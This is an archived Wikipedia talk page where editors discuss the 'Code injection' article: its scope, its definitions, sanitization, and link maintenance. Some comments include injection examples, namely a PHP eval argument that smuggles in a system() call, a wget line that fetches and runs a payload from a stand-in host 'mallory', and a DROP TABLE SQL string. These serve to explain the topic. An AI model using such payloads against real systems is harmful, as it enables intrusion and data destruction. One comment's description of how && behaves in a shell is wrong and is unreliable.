Talk:Code injection

Introduce ways to clean code injection
Such as regexps, and other ways to clean lint out of the expressions. e.g. /s/[&|<>]//g —Preceding unsigned comment added by 86.146.17.45 (talk) 14:16, 11 November 2009 (UTC)

Cleanup!
This could be a very interesting article and I have already learned a lot from it, but it needs attention:


 * A little more background could be set; the article could be confusing for people not familiar with the subject (though that said, you're unlikely to stumble on this article.)
 * There seems to be a little overuse of bold/italics here and their use is not consistent. Sometimes bold is used and sometimes italics are used.
 * More expansion to the "HTML/Script Injection" section?

I'll do what I can later since this looks a very promising article. --82.18.240.96 21:01, 3 January 2006 (UTC)


 * I'd love to help on this article, since it is very much related to Buffer overflow and Shellcode, which I have done alot of work on. Anyone else on board? -- Tompsci 17:54, 11 January 2006 (UTC)

I'm responsible for some parts of the mess here :-) I Suggest:
 * Move the input validation etc parts to a new article and link to it.
 * Adding a non-technical section which describes the issue in a broader, less technical, manner. --Blaufish 16:32, 3 May 2006 (UTC)

I think it would be useful to have a page called "Command Injection" which links to "Code Injection" as a redirect. Am I correct in thinking they are the same thing? --Annmarie westgate 14:24, 12 February 2007 (UTC)

I added the redirect today --Annmarie westgate 15:55, 13 February 2007 (UTC)

I totally stepped on the first code injection example for two reasons. For one that case is NEVER going to happen in REAL software EVER. At no time will a comment from a web forum be passed to system. This is not going to happen because there is no absolutely no constructive reason to do this. Also I think that more people have seen HTML than seen the command-line interface.

How do you explain code injection to someone who has never written code? I think that the understanding of code should be a pre-requisite to reading this article.

Suggested improvement for intro and definition
I wanted to make some improvements to the introductory definition, which read -

"Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or 'inject') code into a computer program to change the course of execution."

It's very odd to say "inject code into a computer program " which is very much not what happens with code injection in any case exemplified or any case where I've heard the term used, as the code is not injected into a program but into a _process_, indeed the introduced code is inside data and is injected into the data segment.

Is anyone aware of a case where code itself within a process actually gets modified by an attack as then the term code injection would then very clearly fit the bill?

I had a go at improving it, but I'm concerned that it's now a bit long. What do you think?CecilWard (talk) 23:26, 25 January 2009 (UTC)

Whats the difference?
Would like to know whats the difference between Throw away bad characters and Filter out known bads-- seems to be the same thing. Interestingly, "Throw away bad characters" is termed as practical and widely used and the "Filter out known bads" is termed as the worst form of defence. Maybe I am ignorant and don't get it - can somebody please explain?


 * I think you're right, so I removed it. 131.211.81.206 09:15, 6 April 2006 (UTC)


 * The world "filter" seems to be inconsistently used among all the sites I've seen, usually to mean "sanitize non-destructively" but sometimes to mean "strip out". I think it would be helpful to disambiguate in the article 64.171.57.66 22:41, 18 April 2006 (UTC)


 * I moved the entire section of secure input / output management to a new page, so the subjects could be expanded and clarified. I agree to 100% that the same thing was presented twice :-) --Blaufish 18:45, 3 May 2006 (UTC)


 * Throwing away and filtering are the same thing. HOWEVER  Filtering and escaping are totally different,  and they are both common methods with dealing with code injection.  —Preceding unsigned comment added by 24.121.216.47 (talk) 06:15, 1 February 2008 (UTC)

scope of code injection to include or not include buffer overflows etc
Hmmm... Personally I view Code Injection as the examples stated, e.g. sql injection, shell injection, php injection etc etc etc - all cases of attacks against a,  ,   like command being fead with user input.

With the current initial description of Code Injection, one might interpret it as buffer overflows and formation string vulnerabilities (which allows injecting machine code into an application) as being code injection.

Altough these problems are similar (they allow aribitrary code execution), they are fundamentally different because they rely on memory problems rather than the "obviously stupid".

I think we should clarify the description to NOT include Buffer Overflows and similar memory problems, but I'm not entirely certain. Opinions please! --Blaufish 19:36, 3 May 2006 (UTC)
 * I think you could mention buffer overflows as a form of code injection as long as you make clear the usage of the term "code injection". In my mind any user input which can be executed beyond that intended to be by the programmer would qualify. This includes but is not limited to:


 * SQL Injection
 * eval Injection
 * Some XSS Attacks
 * Standard Buffer Overflows (those including payloads)
 * DLL Injection?
 * Windows Shatter attacks
 * I don't really have the time to contribute heavily to this article anymore (exam term). But I would be happy to discuss it. -- Tompsci 23:21, 3 May 2006 (UTC)
 * Rather than a blow for blow account, it would be useful to discuss what's common to all these vulnerabilities, i.e. lack of input checking and flaws in such checking (Hotmail.com vulnerabilities?). -- Tompsci 23:27, 3 May 2006 (UTC)

I'm thinking the distinguishing feature of this type of attack is that you have one language lurking inside another. SQL in java or PHP. I think the example with "HTML Injection in IE7 Via Infected DLL" is incorrect. That sounds like an attack on the integrity of the message in transit. Like the attacker is substituting the original with a spoofed message.129.244.241.94 06:47, 13 November 2007 (UTC)

I think that the Buffer overflow is a great example of code injection. I think it is "code injection" regardless of the type of code being injected. In the case of buffer overflows and some format string flaws MACHINE code is being injected. Although the phrase "code injection" does not state if the code is being executed, but in that case code injection wouldn't be a flaw... I'll hold off editing the page for now. —Preceding unsigned comment added by Firealwaysworks (talk • contribs) 02:42, 25 January 2008 (UTC)

What is the answer?
"What happens if arg is set to "10 ; system(\"/bin/echo uh-oh\");" ?" Should not the encyclopedia answer me that instead of asking? --Petervaz 13:03, 28 February 2007 (UTC)


 * Fixed. It runs the program /bin/echo (which just prints some text) on the server. This could be extended to any code, even a sequence of instructions,
 * system(\"wget //mallory/bad.exe && bad.exe\")
 * would download arbitrary code and execute it on the webserver with the same permissions as the php code. --h2g2bob 13:45, 28 February 2007 (UTC)

Include file injection example - how is it possible?
The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in ... How could anyone insert arbitrary values in  given a non-editable drop-down list or listbox as the only means of input? --208.138.31.76 (talk) 20:00, 25 January 2008 (UTC)


 * wow dude you don't have a clue, do you even write code!?    The HTML drop down table is just for the client! You can send any string you want as $_GET, $_POST, $_COOKIE, $_FILE and most $_SERVER super globals.  —Preceding unsigned comment added by 24.121.216.47 (talk) 06:18, 1 February 2008 (UTC)


 * PHP is not my area of expertise (nor is HTML), that is all. I didn't think of bypassing the UI. In other words, yes I had no clue.;-) --208.138.31.76 (talk) 18:51, 18 February 2008 (UTC)

Link farm
The end of the article section "Notable code injection programs" is turning into a link farm - if we're going to include some notable programs, we should be sure that they are notable. Perhaps only including programs that have wiki-articles is an easy way of control. AliveFreeHappy (talk) 19:09, 15 April 2009 (UTC)

"Guest book"
I know this is kinda small, but I think it's stupid to put quotes around the word guestbook. First off, most people know what a guestbook is, I think, and putting quotes around it would be like putting quotes around any other random word. It would be like if I had something called a "Web server" and every time I said "Web server" I put quotes around it. I don't think it's appropriate in this context. Also, wikipedia itself says guestbook is one word: http://en.wikipedia.org/wiki/Guestbook which is how i've always seen it, so putting it as two words, and even midsentence capitalizing the word "Guest" seems wrong grammatically. I'm going to change this, and if anyone has strong reason why this page from wikipedia's "Web server" should have it the way it was when I saw it, I guess change it back. 74.203.78.67 (talk) 14:23, 29 July 2009 (UTC)

Common Windows techniques
I'm surprised that the "code injection" technique of using the Win32 APIs CreateRemoteThread, VirtualAllocEx, and WriteProcessMemory to inject code into a running process is not mentioned here. Or that this sort of technique can be used benevolently to implement a debugger. 174.21.7.133 (talk) 01:57, 16 September 2009 (UTC)

Data sanitization?
Data sanitization redirects to this article. What does it mean? --Abdull (talk) 20:36, 17 February 2010 (UTC)


 * Data sanitization is when you parse the inputs into the program and manipulate them to remove unwanted or uncessary data. It's the main way of protecting against Code Injection. So I guess it makes sense to redirect it here. 222.152.239.223 (talk) 06:04, 5 January 2011 (UTC)


 * That's what i think it means, but i cannot find a definition! --129.13.72.196 (talk) 11:22, 30 July 2015 (UTC)

Dubious definition and legitimate uses
It seems wrong to define code injection only as "the exploitation of a computer bug that is caused by processing invalid data". See "Injecting Code Dynamically with the Debugging API" http://msdn.microsoft.com/en-us/library/bb384380.aspx in the .NET framework for an example of legitimate use. — Preceding unsigned comment added by 188.26.163.110 (talk) 01:05, 8 December 2011 (UTC)

Requested move

 * The following discussion is an archived discussion of a requested move. Please do not modify it. Subsequent comments should be made in a new section on the talk page. Editors desiring to contest the closing decision should consider a move review. No further edits should be made to this section. 

The result of the move request was: Not moved. No supports apart from the nominator, and two opposing comments. Article covers a lot more than just PHP. &mdash; Amakuru (talk) 01:00, 29 December 2013 (UTC)

Code injection → PHP injection – Most of the content deals with PHP code injection, the rest can be merged, as suggested, in other existing articles. DavidBourguignon (talk) 14:39, 19 December 2013 (UTC)

There is little value of specific PHP Injection article, and there is a point to having a page about injection in general. It's better to clobber a lot of PHP examples. I have made some attempts to move towards having a better article with less PHP stuff. --Blaufish (talk) 21:50, 19 December 2013 (UTC)
 * Oppose. I don't see how "most of the content" deals with PHP code injection. There is an equal amount of content discussing SQL or HTML injection. Also, there needs to be an article about code injection in general. J I P  &#124; Talk 19:34, 23 December 2013 (UTC)
 * The above discussion is preserved as an archive of a requested move. Please do not modify it. Subsequent comments should be made in a new section on this talk page or in a move review. No further edits should be made to this section.

AND vs OR
In the Shell injection section, the consequences of AND list vs OR list seem to be swapped. 'cmd1 && cmd2' does cmd2 iff cmd1 does not return zero (indicating cmd1 has "failed")

Bobby Tables
This article needs a reference to Bobby Tables. But I don't know where to put it. Jordan Brown (talk) 18:33, 23 May 2017 (UTC)
 * Could be put in the line UserID: ';DROP TABLE User;order by --' UserID: 'Robert;DROP TABLE User;order by --' QuentinUK (talk) 14:56, 10 December 2018 (UTC)

External links modified
Hello fellow Wikipedians,

I have just modified 3 external links on Code injection. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:
 * Added archive https://web.archive.org/web/20041010124514/http://www.codeproject.com/threads/winspy.asp to http://www.codeproject.com/threads/winspy.asp
 * Added archive https://web.archive.org/web/20060209035745/http://www.codeproject.com/system/inject2exe.asp to http://www.codeproject.com/system/inject2exe.asp
 * Added archive https://web.archive.org/web/20070410133521/http://www.codeproject.com/system/inject2it.asp to http://www.codeproject.com/system/inject2it.asp

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

Cheers.— InternetArchiveBot  (Report bug) 04:50, 10 August 2017 (UTC)

Bad links
I don't feel knowledgable enough to modify this but I want to report a couple of problems:

In the External Links section: Article "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" by Tadeusz Pietraszek and Chris Vanden Berghe This link fails because http://chris.vandenberghe.org is no longer valid. I searched for this article in other places but failed to find a valid link to it. I don't want to just delete it because it sounds like a useful article if it can be found.

IMO The Daily WTF regularly reports real-world incidences of susceptibility to code injection in software.

This link doesn't provde a wide range of code injection incidences and should be deleted. It seems to specialize in SQL code injection.

Rjapenga (talk) 15:58, 30 October 2017 (UTC)Bob Japenga

External links modified
Hello fellow Wikipedians,

I have just modified 2 external links on Code injection. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:
 * Added archive https://web.archive.org/web/20100729023112/http://www.public.asu.edu/~rsriniv8/Documents/srini-das.pdf to http://www.public.asu.edu/~rsriniv8/Documents/srini-das.pdf
 * Added archive https://web.archive.org/web/20050924080540/http://www.emsisoft.com/en/kb/articles/news041104/ to http://www.emsisoft.com/en/kb/articles/news041104/

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

Cheers.— InternetArchiveBot  (Report bug) 20:04, 20 December 2017 (UTC)

Programming languages evolving to make code injection easier
"❛More and more mocking tools now use code injection to solve the problem of replacing static and non virtual members. Programming language will probably evolve to generate mocking-compatible bytecode. One direction will be to restrict the usage of non virtual members, the other one will be to generate, at least in test situations, a bytecode allowing non-inheritance based mocking.❜"Dependency_inversion_principle QuentinUK (talk) 14:59, 10 December 2018 (UTC)


 * That's talking about dependency injection, which is unrelated. 73.223.72.200 (talk) 23:52, 16 June 2024 (UTC)